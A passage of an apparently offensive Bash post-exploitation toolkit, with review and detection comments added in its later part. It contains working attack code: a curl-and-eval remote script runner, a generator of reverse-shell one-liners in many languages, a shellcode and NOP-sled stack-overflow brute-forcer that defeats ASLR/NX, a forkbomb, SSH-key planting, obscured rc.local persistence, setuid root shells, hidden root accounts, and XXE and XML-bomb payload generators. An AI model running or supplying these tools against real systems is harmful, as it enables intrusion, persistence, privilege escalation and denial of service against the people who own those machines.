["2.6.23|2.6.24"]="CVE-2008-0600" 804 | ["2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22|2.6.23|2.6.24|2.6.24.1"]="CVE-2008-0900" 805 | ["2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16|2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22"]="CVE-2008-4210" 806 | ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1185" 807 | ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1337" 808 | ["2.4.[4-37]|2.6.[0-30]"]="CVE-2009-2692" 809 | ["2.6.[1-19]"]="CVE-2009-2698" 810 | 
["2.4.[4-37]|2.6.[15-31]"]="CVE-2009-3547" ) 811 | kernel=`uname -r` 812 | for exploit in "${!exploits[@]}"; do 813 | echo "${kernel}|grep -E ${exploit}" > tmp 814 | check=$? 815 | if [ "$check" -eq 0 ]; then 816 | echo "${red}${bold}<.>${reset} ${exploits[$exploit]}" 817 | ((hits++)) 818 | fi 819 | done 820 | if [ $hits = 0 ]; then 821 | print_error "No exploits found" 822 | else 823 | echo "${magenta}(${hits} hits )${reset}" 824 | fi 825 | rm tmp 826 | fi 827 | } 828 | 829 | 830 | memexec(){ 831 | if [[ "$@" =~ .*-h.* ]]; then 832 | echo " 833 | ${underline}USAGE:${reset} 834 | dexec [-h] HOST URL 835 | ${underline}POSITIONAL ARGUMENTS:${reset} 836 | HOST Remote server address 837 | URL Full path of the script on the remote server 838 | ${underline}DESCRIPTION:${reset} 839 | Download and execute a remote bash script in memory" 840 | else 841 | if [ $# -eq 0 ]; then 842 | print_error "Specify the server address" 843 | elif [ $# -eq 1 ]; then 844 | print_error "Specify the URL of the script" 845 | else 846 | host=$1 847 | script=$2 848 | X=`curl -fsSL "http://${host}/${script}"` 849 | eval "$X" 850 | print_good "Succesfully executed ${script} from memory" 851 | fi 852 | fi 853 | } 854 | 855 | jshell(){ 856 | arguments_errors=0 857 | if [[ "$@" =~ .*-h.* ]]; then 858 | echo " 859 | ${underline}USAGE:${reset} 860 | jshell [-h] LHOST LPORT 861 | ${underline}POSITIONAL ARGUMENTS:${reset} 862 | LHOST Local address to listen on (set to "-" to automatically detect the ip) 863 | LPORT Local port to listen on 864 | ${underline}DESCRIPTION:${reset} 865 | Get a Javascript shell with XSS" 866 | else 867 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 868 | lhost=$1 869 | elif [ "$1" = "-" ]; then 870 | lhost=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` 871 | else 872 | print_error "Wrong IP address format" 873 | ((arguments_errors++)) 874 | fi 875 | if [ "$2" -eq "$2" ] 2>/dev/null; 
then 876 | lport=$2 877 | else 878 | print_error "Wrong port format: integer required" 879 | ((arguments_errors++)) 880 | fi 881 | if [ $arguments_errors = 0 ]; then 882 | if [ "$OSTYPE" = "darwin" ]; then 883 | netcat_cmd="nc -nlvk ${lport}" 884 | else 885 | netcat_cmd="nc -nlvp ${lport}" 886 | fi 887 | payload="" 888 | print_good "Generated JS payload:" 889 | echo ${payload} 890 | echo 891 | print_info "Waiting for the payload to be executed..." 892 | out=`$netcat_cmd` 893 | fi 894 | fi 895 | } 896 | 897 | shellcode(){ 898 | if [[ "$@" =~ .*-h.* ]]; then 899 | echo " 900 | ${underline}USAGE:${reset} 901 | shellcode [-h] SHELLCODE 902 | ${underline}POSITIONAL ARGUMENTS:${reset} 903 | SHELLCODE Shellcode to execute in '\x' escaped form 904 | ${underline}DESCRIPTION:${reset} 905 | Execute specified shellcode" 906 | else 907 | if [ $# -eq 0 ]; then 908 | print_error "Specify the shellcode to run" 909 | else 910 | shellcode=$1 911 | cat >executor.c <dos.yml <dos.xml < 960 | 962 | 963 | 964 | 965 | 966 | 967 | 968 | 969 | 970 | 971 | 972 | ]> 973 | &lol9; 974 | EOL 975 | print_good "Saved payload as ${bold}dos.xml${reset}" 976 | else 977 | print_error "No such format" 978 | fi 979 | fi 980 | fi 981 | } 982 | 983 | xxe(){ 984 | if [[ "$@" =~ .*-h.* ]]; then 985 | echo " 986 | ${underline}USAGE:${reset} 987 | xxe [-h] [PAYLOAD] 988 | ${underline}OPTIONAL POSITIONAL ARGUMENTS:${reset} 989 | [PAYLOAD] Payload to execute inside the entity (default: file:///etc/passwd) 990 | ${underline}DESCRIPTION:${reset} 991 | Generate a XML External Entity Injection file" 992 | else 993 | if [ $# -eq 0 ]; then 994 | payload="file:///etc/passwd" 995 | else 996 | payload=$1 997 | fi 998 | cat >file.xml < 1000 | 1001 | ]> 1002 | 1003 | &xxe; 1004 | mypass 1005 | 1006 | EOL 1007 | print_good "Generated ${bold}file.xml${reset} with ${bold}${payload}${reset} payload" 1008 | fi 1009 | } 1010 | 1011 | mod(){ 1012 | if [[ "$@" =~ .*-h.* ]]; then 1013 | echo " 1014 | ${underline}USAGE:${reset} 
mod [-h] ACTION EXTENSION TEXT
${underline}POSITIONAL ARGUMENTS:${reset}
ACTION Operation to perform with the text {append, prepend, replace, remove}
EXTENSION File extension
TEXT Text to append to files
${underline}DESCRIPTION:${reset}
Modify contents of every file with specified extension in current directory"
  else
    if [ $# -eq 0 ]; then
      print_error "Specify the ACTION"
    elif [ $# -eq 1 ]; then
      print_error "Specify the EXTENSION"
    elif [ $# -eq 2 ]; then
      print_error "Specify the TEXT"
    else
      # NOTE(review): `ls` output is word-split (unquoted ${files[*]}), so a
      # file name containing whitespace becomes several bogus entries; a glob
      # loop (for file in *) would avoid this.
      files=`ls`
      action=$1
      extension=$2
      text=$3
      for file in ${files[*]}; do
        # NOTE(review): ${extension} is an unanchored regex, not a literal
        # suffix — "c" also matches "foo.conf" and "." matches every file.
        if [[ "$file" =~ .*${extension} ]]; then
          if [ $action = "append" ]; then
            # NOTE(review): inconsistent with the help text and with the
            # prepend/replace branches: here TEXT is used as a *file name*
            # handed to cat, not as literal text.
            cat $text >> $file
          elif [ $action = "prepend" ]; then
            # NOTE(review): $text is unquoted, so text containing spaces is
            # split into several printf arguments.
            printf '%s\n%s\n' $text "$(cat $file)" > $file
          elif [ $action = "replace" ]; then
            echo $text > $file
          elif [ $action = "remove" ]; then
            # NOTE(review): deletes lines matching the literal regex
            # "pattern"; $text is never used in this branch.
            sed -i '/pattern/d' $file
          else
            # NOTE(review): the message omits "remove", which is handled above.
            print_error "No such action. Available choices: {append, prepend, replace}"
          fi
        fi
      done
    fi
  fi
}

# List D-Bus bus names on the system and session buses (the help text says
# "netbus"; it means D-Bus).
getdbus(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
getdbus [-h]
${underline}DESCRIPTION:${reset}
List all available netbus services"
  else
    print_good "Dbus services for system:"
    dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
    print_good "Dbus services for session:"
    # NOTE(review): this line is truncated — `--print-repl` (sic) and no
    # object path / method name — so dbus-send rejects it and the session bus
    # is never listed. The system-bus line above shows the intended form.
    dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-repl
  fi

}

# Probe for mandatory-access-control / hardening controls (SELinux, AppArmor,
# grsec/PaX). A present control is reported via print_error (from the tool's
# point of view), and print_good is used when none is found.
getsec(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
getsec [-h]
${underline}DESCRIPTION:${reset}
List security services"
  else
    none=0
    # selinuxenabled exits 0 when SELinux is enabled.
    # NOTE(review): `echo $? | grep -q 0` is a substring match on the status
    # text, so a status of 10, 20, 100 … also reads as "enabled";
    # `if selinuxenabled >/dev/null 2>&1; then` is the direct form.
    selinuxenabled >/dev/null 2>/dev/null
    if echo $? | grep -q 0; then
      print_error "SELinux is enabled."
      ((none++))
    fi
    # `type` only tells whether aa-status is on PATH, not whether AppArmor is
    # loaded or enforcing — hence "probably" in the message.
    type aa-status >/dev/null 2>/dev/null
    if echo $? | grep -q 0; then
      print_error "AppArmor is probably installed."
1088 | ((none++)) 1089 | fi 1090 | if cat /proc/self/status | grep -q PaX; then 1091 | print_error "GrSec and PaX are present" 1092 | ((none++)) 1093 | fi 1094 | if [ $none -eq 0 ]; then 1095 | print_good "No security measures detected" 1096 | fi 1097 | fi 1098 | 1099 | } 1100 | 1101 | getidle(){ 1102 | if [[ "$@" =~ .*-h.* ]]; then 1103 | echo " 1104 | ${underline}USAGE:${reset} 1105 | getidle [-h] 1106 | ${underline}DESCRIPTION:${reset} 1107 | Get active PTYs ant their idle time" 1108 | else 1109 | ptys=`ls /dev/pts | grep '[[:digit:]]' | sort -g | tr '\n' ' '` 1110 | echo $ptys | tr ' ' '\n' | while read i;do 1111 | echo -ne "[*] PTY $i has been idle for " 1112 | idler=`stat -t /dev/pts/$i | awk -F " " '{ print $12 }'` 1113 | echo -ne "$((`date +%s` - $idler)) seconds.\n" 1114 | done 1115 | fi 1116 | 1117 | } 1118 | 1119 | keyinstall(){ 1120 | if [[ "$@" =~ .*-h.* ]]; then 1121 | echo " 1122 | ${underline}USAGE:${reset} 1123 | keyinstall [-h] KEY 1124 | ${underline}POSITIONAL ARGUMENTS:${reset} 1125 | KEY RSA key to add 1126 | ${underline}DESCRIPTION:${reset} 1127 | Add your RSA key to list of SSH authorized keys" 1128 | else 1129 | if [ $# -eq 0 ]; then 1130 | print_error "Specify the KEY" 1131 | else 1132 | key=$1 1133 | touch /dev/shm/.q/.ssh 1134 | touch -r / 1135 | sshkey="ssh-rsa $key `whoami`@`hostname`" 1136 | echo $sshkey >> ~/.ssh/authorized_keys 1137 | print_good "Added $key to list of authorized keys" 1138 | fi 1139 | fi 1140 | 1141 | } 1142 | 1143 | revshellgen(){ 1144 | function bash_shell(){ 1145 | echo -e "bash -i >& /dev/tcp/$ipaddr/$port 0>&1" 1146 | } 1147 | function perl_shell(){ 1148 | echo -e "perl -e 'use Socket; \$i=\"$ipaddr\" ;\$p=$port ;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" 1149 | } 1150 | function python_shell(){ 1151 | echo -e "python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(( \"$ipaddr\",$port ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" 1152 | } 1153 | function php_shell(){ 1154 | echo -e "php -r '\$sock=fsockopen(\" $ipaddr\",$port );exec(\"/bin/sh -i <&3 >&3 2>&3\");'" 1155 | } 1156 | function ruby_shell(){ 1157 | echo -e "ruby -rsocket -e'f=TCPSocket.open( \"$ipaddr\",$port ).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" 1158 | } 1159 | function netcat1_shell(){ 1160 | echo -e "nc -e /bin/sh $ipaddr $port \n" 1161 | } 1162 | function netcat2_shell(){ 1163 | echo -e "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ipaddr $port >/tmp/f\n" 1164 | } 1165 | function netcat3_shell(){ 1166 | echo -e "rm /tmp/l;mknod /tmp/l p;/bin/sh 0/tmp/l" 1167 | } 1168 | function java_shell(){ 1169 | echo -e """ 1170 | r = Runtime.getRuntime() 1171 | p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/ $ipaddr / $port ;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]) 1172 | p.waitFor() 1173 | """ 1174 | } 1175 | function shellshock_rce_shell(){ 1176 | echo -e "wget -U \"() { test;};echo \"Content-type: text/plain\"; echo; echo; YOUR_COMMAND \" http:// TARGET_IP /cgi-bin/status\n" 1177 | } 1178 | function shellshock_bind_shell(){ 1179 | echo "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\\r\\nHost: \\r\\nConnection: close\\r\\n\\r\\n\" | nc 80" 1180 | } 1181 | function lua_shell(){ 1182 | echo -e "lua5.1 -e 'local host,port = \" $ipaddr \", $port local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'" 1183 | } 1184 | function powershell_shell(){ 1185 | echo -e "powershell 
-NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\" $ipaddr \", $port );\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" 1186 | } 1187 | function telnet_shell(){ 1188 | echo -e "telnet $ipaddr $port | /bin/bash | telnet $ipaddr 9999 " 1189 | } 1190 | if [[ "$@" =~ .*-h.* ]]; then 1191 | echo " 1192 | ${underline}USAGE:${reset} 1193 | revshellgen [-h] [-l] TYPE LHOST LPORT 1194 | ${underline}POSITIONAL ARGUMENTS:${reset} 1195 | -l Show available reverse shells 1196 | ${underline}POSITIONAL ARGUMENTS:${reset} 1197 | TYPE Type of the shell to use 1198 | LHOST Listening host 1199 | LPORT Listening port 1200 | ${underline}DESCRIPTION:${reset} 1201 | Output a reverse shell of chosen type" 1202 | elif [[ "$@" =~ .*-l.* ]]; then 1203 | print_good "Available reverse shells:" 1204 | echo " 1205 | 1) bash_shell 1206 | 2) ruby_shell 1207 | 3) perl_shell 1208 | 4) netcat1_shell 1209 | 5) netcat2_shell 1210 | 6) netcat3_shell 1211 | 7) python_shell 1212 | 8) java_shell 1213 | 9) php_shell 1214 | 10) shellshock_shell 1215 | 11) lua_shell 1216 | 12) powershell_shell 1217 | 13) telnet_shell" 1218 | else 1219 | type=$1 1220 | ipaddr=$2 1221 | port=$3 1222 | $type 1223 | fi 1224 | } 1225 | 1226 | 1227 | ldexec(){ 1228 | if [[ "$@" =~ .*-h.* ]]; then 1229 | echo " 1230 | ${underline}USAGE:${reset} 1231 | ldexec [-h] FILE 1232 | ${underline}POSITIONAL ARGUMENTS:${reset} 1233 | FILE File to execute 1234 | ${underline}DESCRIPTION:${reset} 1235 | Execute file without execution permission bit set" 1236 | else 1237 | if [ $# -eq 0 ]; then 1238 | print_error 
"Specify the FILE" 1239 | else 1240 | file=$1 1241 | cp $file /tmp/abcde 1242 | chmod a-x /tmp/abcde 1243 | linker=`ls /lib|grep -oE "ld-linux.*.so.2"` 1244 | /lib/$linker /tmp/abcde 1245 | fi 1246 | fi 1247 | 1248 | } 1249 | 1250 | forkbomb(){ 1251 | if [[ "$@" =~ .*-h.* ]]; then 1252 | echo " 1253 | ${underline}USAGE:${reset} 1254 | forkbomb [-h] [INTERVAL] 1255 | ${underline}POSITIONAL ARGUMENTS:${reset} 1256 | INTERVAL Number of seconds of optional delay 1257 | ${underline}DESCRIPTION:${reset} 1258 | Run a forkbomb" 1259 | else 1260 | if [ $# -eq 1 ]; then 1261 | delay=$1 1262 | sleep $delay 1263 | else 1264 | :(){ :|:& };: 1265 | fi 1266 | fi 1267 | } 1268 | 1269 | machange(){ 1270 | if [[ "$@" =~ .*-h.* ]]; then 1271 | echo " 1272 | ${underline}USAGE:${reset} 1273 | machange [-h] [IFACE] [MAC] 1274 | ${underline}POSITIONAL ARGUMENTS:${reset} 1275 | IFACE Interface to change address on 1276 | MAC New MAC adderss 1277 | ${underline}DESCRIPTION:${reset} 1278 | Change MAC address" 1279 | else 1280 | if [ $# -eq 0 ]; then 1281 | print_error "Not enough arguments" 1282 | elif [ $# -eq 1 ]; then 1283 | iface=$1 1284 | elif [ $# -eq 2 ]; then 1285 | mac=$2 1286 | else 1287 | iface="eth0" 1288 | fi 1289 | /etc/init.d/networking stop 1290 | ifconfig $iface hw ether $mac 1291 | /etc/init.d/networking start 1292 | if [ $# -eq 0 ]; then 1293 | print_good "Changed mac address to $mac" 1294 | fi 1295 | fi 1296 | } 1297 | 1298 | 1299 | aslray(){ 1300 | if [[ "$@" =~ .*-h.* ]]; then 1301 | echo " 1302 | ${underline}USAGE:${reset} 1303 | aslray BINARY BUFSIZE [SHELLCODE] 1304 | ${underline}POSITIONAL ARGUMENTS:${reset} 1305 | INTERFACE Interface to perform stealthing on 1306 | BUFSIZE Buffer to pass as an argument 1307 | SHELLCODE Shellcode to execute (default: spawn shell) 1308 | ${underline}DESCRIPTION:${reset} 1309 | ALSR and DEP/NX bypass for x86/x86_64 (stack smashing) " 1310 | else 1311 | if [ $# -eq 0 ]; then 1312 | print_error "Specify BINARY" 1313 | elif [ $# -eq 1 ]; 
then 1314 | print_error "Specify BUFSIZE" 1315 | else 1316 | FILE=$1 1317 | BUFFER=$2 1318 | SC=$3 1319 | x86=$(file $FILE | grep '32-bit') 1320 | if [[ "$x86" ]]; then 1321 | print_info 'ELF IS 32-BIT' 1322 | if [[ `readelf -l $FILE | grep RWE` ]]; then 1323 | print_info 'STACK IS EXECUTABLE' 1324 | print_info 'SPRAYING NOPSLED AND SHELLCODE...' 1325 | if [[ "$SC" != "" ]] 1326 | then 1327 | SC=$(echo $SC | sed s/x/\\\\x/g) 1328 | export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC) 1329 | else 1330 | export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80') 1331 | fi 1332 | print_info 'EXPLOITING...' 1333 | $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz') 1334 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x80\x80\xfc\xff') ; done 1335 | else 1336 | print_good 'DEP/NX DETECTED' 1337 | pprint_info 'SPRAYING SHELL...' 1338 | export shell0=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1339 | export shell1=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1340 | export shell2=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1341 | export shell3=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1342 | export shell4=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1343 | export shell5=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1344 | export shell6=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1345 | export shell7=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1346 | export shell8=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1347 | export shell9=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) 1348 | print_info 'EXPLOITING... 
may take a while, if stuck then retry' 1349 | sleep 2 1350 | TYPE=/etc/os-release 1351 | if [[ `grep jessie $TYPE` ]] 1352 | then 1353 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\xe0\x83\x58\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1354 | # TODO use 'timeout 1 $FILE' in order not to stuck, but how to spawn a shell? 1355 | elif [[ `grep stretch $TYPE` ]] 1356 | then 1357 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe8\x62\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1358 | elif [[ `grep Xenial $TYPE` ]] 1359 | then 1360 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe9\x63\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1361 | elif [[ `grep Trusty $TYPE` ]] 1362 | then 1363 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x70\xce\x56\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done 1364 | else 1365 | 'NOT DEBIAN OR UBUNTU!!!' 1366 | exit 2 1367 | fi 1368 | fi 1369 | print_info "Retry if the shellcode wasn't executed until now" 1370 | else 1371 | print_info 'ELF IS 64-BIT' 1372 | print_info 'SPRAYING NOPSLED AND SHELLCODE...' 1373 | if [[ "$SC" != "" ]] 1374 | then 1375 | SC=$(echo $SC | sed s/x/\\\\x/g) 1376 | for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC); done 1377 | else 1378 | for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'); done 1379 | fi 1380 | print_good 'EXPLOITING... 
may take a while' 1381 | while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -ne '\x80\x80\x80\x80\xfc\x7f') ; done 1382 | fi 1383 | fi 1384 | 1385 | fi 1386 | } 1387 | 1388 | 1389 | uperm(){ #FINISH THIS 1390 | if [[ "$@" =~ .*-h.* ]]; then 1391 | echo " 1392 | ${underline}USAGE:${reset} 1393 | uperm [-h] 1394 | ${underline}DESCRIPTION:${reset} 1395 | Show files permissions for current user" 1396 | else 1397 | : 1398 | fi 1399 | } 1400 | 1401 | watch(){ 1402 | : 1403 | } 1404 | 1405 | shellshock(){ 1406 | if [[ "$@" =~ .*-h.* ]]; then 1407 | echo " 1408 | ${underline}USAGE:${reset} 1409 | shellshock [-h] 1410 | ${underline}DESCRIPTION:${reset} 1411 | Check for shellshock vulnerabilities" 1412 | else 1413 | hits=0 1414 | env X='() { :; }; echo "${green}${bold}}CVE-2014-6271${reset}"' bash -c id 1415 | if [ $# -eq 0 ]; then 1416 | print_error "Check #1 - not vulnerable" 1417 | fi 1418 | env X='() { (a)=>\' bash -c "${green}${bold}CVE-2014-7169${reset}"; cat echo 1419 | if [ $# -eq 0 ]; then 1420 | print_error "Check #2 - not vulnerable" 1421 | fi 1422 | bash -c 'true </dev/null; then 1450 | if [ $# -eq 0 ]; then 1451 | print_error "Specify IFACE and PORTS" 1452 | elif [ $# -eq 1 ]; then 1453 | print_error "Specify PORTS" 1454 | else 1455 | iface="eth0" 1456 | sudo iptables -P INPUT DROP 1457 | IFS=',' read -ra PORTS <<< "$ports" 1458 | for port in ${PORTS[*]}; do 1459 | iptables -A INPUT -i $iface -p tcp --dport $port -j ACCEPT #Check this shit 1460 | done 1461 | print_good "Blocked all ports except whitelisted" 1462 | fi 1463 | else 1464 | print_error "Unable to perform port blocking: iptables is not installed" 1465 | fi 1466 | fi 1467 | } 1468 | 1469 | persist(){ 1470 | if [[ "$@" =~ .*-h.* ]]; then 1471 | echo " 1472 | ${underline}USAGE:${reset} 1473 | persist [-h] COMMAND 1474 | ${underline}POSITIONAL ARGUMENTS:${reset} 1475 | COMMAND Command to be launched on every startup 1476 | ${underline}DESCRIPTION:${reset} 1477 
Specify command that will be launched on every boot.
It will be encoded and written to /etc/rc.local."
  else
    if [ $# -eq 0 ]; then
      print_error "Specify the command"
    else
      root_check
      command=$1
      # COMMAND is round-tripped through base64 so that the line appended to
      # rc.local is `$(eval echo -n '<base64>' | base64 -d)` rather than the
      # plaintext command.
      # Detection: any write to /etc/rc.local is a high-signal file-integrity
      # event; a `base64 -d` inside a command substitution in that file is
      # the artifact this leaves.
      encode_cmd="echo -n '$command' | base64"
      encoded=$(eval "$encode_cmd")
      decode_cmd="echo -n '$encoded' | base64 -d"
      decoder="$""(eval ""$decode_cmd)"
      sudo echo $decoder >> /etc/rc.local
      print_good "Appended encoded command to /etc/rc.local"
    fi
  fi
}

# Copy a shell binary and set the setuid bit on the copy.
# Optional $1 (source binary, default $SHELL) and $2 (destination, default a
# `mktemp -u` name) are accepted but not mentioned in the help text, which
# also says /tmp while mktemp honours $TMPDIR.
# NOTE(review): `mktemp -u` only prints a name and creates nothing, so the
# path is unreserved until cp runs.
# Detection: `find / -perm -4000 -uid 0` lists setuid-root files; a setuid
# copy of a shell outside package-managed paths stands out.
rootshell(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
rootshell [-h]
${underline}DESCRIPTION:${reset}
Create a rootshell binary under /tmp directory"
  else
    root_check
    local shellfile=${1-$SHELL}
    local rootshell=${2-$(mktemp -u)}
    cp "$shellfile" "$rootshell"
    chmod u+s "$rootshell"
    print_good "Created a rootshell"
    ls -la "$rootshell"
  fi
}

# Create a hidden user on macOS via dscl (the help header says "useradd", the
# function is usradd). Only the osx branch does anything; $platform is
# presumably set elsewhere in this file.
# NOTE(review): `root_check()` is a function *definition*, not a call — bash
# takes the `if … fi` that follows as the new body of root_check. So when
# usradd runs without -h nothing below executes, and the real root_check
# helper is replaced. The call form used by persist/rootshell above is plain
# `root_check`. The same construct appears in forward and ghost below.
# NOTE(review): every dscl/mv line uses `|| print_good …`, so each "success"
# message prints only when its command *fails*.
# Detection (macOS): `dscl . -list /Users IsHidden` shows the attribute set
# here; a home directory under /var instead of /Users is another artifact.
usradd(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
useradd [-h] USERNAME
${underline}POSITIONAL ARGUMENTS:${reset}
USERNAME Name of the new user
${underline}DESCRIPTION:${reset}
Create a new hidden root user on host (currently OSX only)"
  else
    root_check()
    if [ $# -eq 0 ]; then
      print_error "Specify the username"
    else
      user=$1
      if [ $platform == "osx" ]; then
        dscl . -create /Users/$user PrimaryGroupID 80 || print_good "Created root user"
        sudo dscl . create /Users/$user IsHidden 1 || print_good "Succesfully hid user"
        sudo mv /Users/$user /var/$user || print_good "Moved $user home directory under /var"
        sudo dscl . -create /Users/$user NFSHomeDirectory /var/$user || print_good "Succesfully updated new home directory"
        sudo dscl . -delete "/SharePoints/$user's Public Folder" || print_good "Deleted $user original home directory"
      else
        print_error "Platform is not supported"
      fi
    fi
  fi
}

# Placeholder: the help promises an in-memory credential search, but the body
# only calls root_check.
swapdump(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
swapdump [-h]
${underline}DESCRIPTION:${reset}
Search for in-memory credentials"
  else
    root_check
  fi

}

# Local ssh port forward: `ssh USER@HOST -L PORT:HOST:PORT`. The ssh_vpn mode
# is a no-op (`:`).
# NOTE(review): `root_check()` here is a function definition (see usradd), so
# the argument checks and the ssh call below are never executed as written.
# NOTE(review): the check after ssh tests `$# -eq 0` (the argument count,
# which is >= 4 in this branch) rather than ssh's exit status, so it always
# reaches command_error_exit; `if [ $? -eq 0 ]; then` directly after the ssh
# line matches the intent.
# $mode is assigned but the branches test $1 directly.
forward(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
forward [ssh|ssh_vpn] USERNAME HOST PORT
${underline}DESCRIPTION:${reset}
Perform ssh port forwarding
${underline}POSITIONAL ARGUMENTS:${reset}
USERNAME Name of the ssh user
HOST Target ip
PORT Port to forward
"
  else
    root_check()
    if [ $# -eq 0 ]; then
      print_error "Specify mode"
    elif [ $# -eq 1 ]; then
      print_error "Specify USERNAME"
    elif [ $# -eq 2 ]; then
      print_error "Specify HOST"
    elif [ $# -eq 3 ]; then
      print_error "Specify PORT"
    else
      mode=$1
      username=$2
      host=$3
      port=$4
      if [ $1 == "ssh" ]; then
        ssh $username@$host -L $port:$host:$port
        if [ $# -eq 0 ]; then
          print_good "Port forward performed succesfully"
        else
          command_error_exit
        fi
      elif [ $1 == "ssh_vpn" ]; then
        :
      else
        print_error "No such option"
      fi
    fi
  fi


}

# Toggle a "stealth" network mode (MAC / hostname spoofing); the body continues
# below this point.
# NOTE(review): `root_check()` is a function definition (see usradd) rather
# than a call.
# NOTE(review): $iface is computed here but the rest of the function reads
# INTERFACE=$2 instead, so the "eth0" default is never used. The body also
# uses `exit 3` on a bad interface, which terminates the interactive shell
# when this file is sourced rather than executed.
ghost(){
  if [[ "$@" =~ .*-h.* ]]; then
    echo "
${underline}USAGE:${reset}
ghost on|off [INTERFACE]
${underline}POSITIONAL ARGUMENTS:${reset}
INTERFACE Interface to perform stealthing on
${underline}DESCRIPTION:${reset}
Disappear from the net"
  else
    root_check()
    if [ $# -eq 1 ]; then
      iface="eth0"
    elif [ $# -eq 2 ]; then
